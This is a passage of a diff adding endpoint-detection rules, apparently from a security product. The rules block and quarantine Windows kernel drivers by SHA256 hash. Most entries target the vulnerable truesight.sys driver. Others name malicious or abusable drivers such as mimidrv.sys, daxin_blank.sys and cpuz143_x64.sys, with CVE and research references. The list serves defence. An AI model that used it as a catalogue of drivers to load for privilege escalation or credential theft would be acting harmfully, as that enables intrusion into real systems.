+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145129Z",
+ "creation_date": "2026-03-23T11:45:31.145131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1154d885751e694cff686db2d65497d113e607eef765e555076a4462b54b636",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7589b6b-f256-5e5a-8334-6db2c20276b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611218Z",
+ "creation_date": "2026-03-23T11:45:29.611220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4e93f592a8342b0eb582d24a114348ce40ecb3c1e7b238d731b02e17d5aae7d",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7604fc2-c79f-52d0-abd9-203185cf065e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154299Z",
+ "creation_date": "2026-03-23T11:45:31.154300Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "967b7ba007fa14fb9309de521189c7fb5dc2215b958c2fd905605106278d7600",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b76e3d53-45aa-5d77-ace5-24b299698aa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158800Z",
+ "creation_date": "2026-03-23T11:45:31.158803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158809Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4479cf843b70d11708e9763ec7e49d228fbd16205955306f5400f5af1558a2ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7724d1e-7256-5a18-a40e-fd790edf2181",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983140Z",
+ "creation_date": "2026-03-23T11:45:29.983142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530",
+ "comment": "Malicious Kernel Driver (aka daxin_blank.sys) [https://www.loldrivers.io/drivers/7e80423f-8b30-4ee2-b904-9f5421826a8c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7859ea6-fad4-503d-812f-41295bc7890a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973585Z",
+ "creation_date": "2026-03-23T11:45:29.973587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3fa6379951f08ed3cb87eeba9cf0c5f5e1d0317dcfcf003b810df9d795eeb73e",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b78b6ac2-b396-5a67-b46e-66cca85a2b3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827543Z",
+ "creation_date": "2026-03-23T11:45:30.827545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ece9cb2d25fa5c96818f0cf91d82aba6d6d2f861cc0c44e5ad32cd5b4f57fd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b78cb50f-875e-50ed-aa71-b9d7d0936006",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972612Z",
+ "creation_date": "2026-03-23T11:45:29.972614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4eca7db365929ff7c5c785e2eab04ef8ec67ea9edcf7392f2b74eccd9449148",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b79bd2bd-4b72-5bdb-98f0-3f2f386feb63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830239Z",
+ "creation_date": "2026-03-23T11:45:31.830241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecb07e72d6937ab5cee4a7b8176351cbdefa3e0b230a5973b8fc6c2f2c02f30d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7a1d707-6781-57b0-a7e3-cc26171c62e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826578Z",
+ "creation_date": "2026-03-23T11:45:31.826580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "090b6145fa96cb218f77f8c03c0c17f0f3d579f234761781ca6d6cb2122959c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7ad808c-fe08-5b42-af00-f1ecdfb49ff9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148740Z",
+ "creation_date": "2026-03-23T11:45:31.148742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148747Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "870646a801f2e60c1d7bc2fcc305ad8511c9eabdc10828fcdd36b111e51a6f03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7add52e-ac7c-5569-95dd-8287c619b80a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818709Z",
+ "creation_date": "2026-03-23T11:45:31.818712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02fd2579e9c55b80c7c86b9f7a9034ec8fd80824e7228840d1f29aa47a739014",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7b46e24-f9df-59d4-9deb-5a6548d2592a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833782Z",
+ "creation_date": "2026-03-23T11:45:30.833785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d1d818a5f3f44aa2a125059f27419313e91d5e33be5060cc5b0f79e740625a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7cd6835-dfc5-509c-8f7e-00f1adccf277",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608317Z",
+ "creation_date": "2026-03-23T11:45:29.608319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608324Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a22d5d42dd0cdae016b536799ab9c384c23b42f5662f0b115b3b85ccb9e23242",
+ "comment": "Malicious Kernel Driver (aka hlpdrv.sys) [https://news.sophos.com/en-us/2025/12/06/inside-shanya-a-packer-as-a-service-fueling-modern-attacks/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7cdf172-00a3-5086-bb4e-a74eeb58b40a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828919Z",
+ "creation_date": "2026-03-23T11:45:31.828921Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c05e168fc2806a4883713813487fc501462ee69e28ecfc76b8044b9d057f204",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7cf1804-f8a1-52bd-915b-ec0b61179d3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500038Z",
+ "creation_date": "2026-03-23T11:45:31.500041Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2c9f7ececbafd9936ad4d72f6d1cfd333f9cf7c9320e8383a6d18dfd40892ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7dd8c09-7318-5d98-b03f-b34d4475d3bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825596Z",
+ "creation_date": "2026-03-23T11:45:30.825598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd4702f963b6c4fa7884c87e8924f9062e608216a299e5acbaa7421f2287711b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7e9da62-716d-5ce7-b165-a0999f0e2881",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823865Z",
+ "creation_date": "2026-03-23T11:45:30.823867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823889Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "347acba74fdcbeac671521739f8a34ec0e378caf716c31f55616f9f843e4d0d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7f1376b-3360-5169-8897-7f17e8eb3f47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500091Z",
+ "creation_date": "2026-03-23T11:45:31.500094Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3114d18c1b9f7b04688b779d26c24ad199ed06ab41a9704dcdd723c1de370115",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7f2b9f8-be09-5b45-84bf-e2a256108fac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615502Z",
+ "creation_date": "2026-03-23T11:45:29.615504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615509Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e951858d5317724c015eef07d402e8bcb33cf1a7c2ccf7a75cea63e3430d16a2",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7f561d9-eb74-5ec2-b211-6867ba400773",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489179Z",
+ "creation_date": "2026-03-23T11:45:31.489181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47e5bc2ff855dd341963b37f07d51c701f188a5f8ce09e67dfc6fa11cfb5e01f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b7fd577a-7f46-5699-b917-f93653032cc4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467326Z",
+ "creation_date": "2026-03-23T11:45:30.467330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2d3101ef507e6d9ae5475d8fd9b1ca6d2548fe0454c25389d6981f1b33f88f7",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b80d1e6d-32be-53a9-a13b-0f98ae3b18bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967967Z",
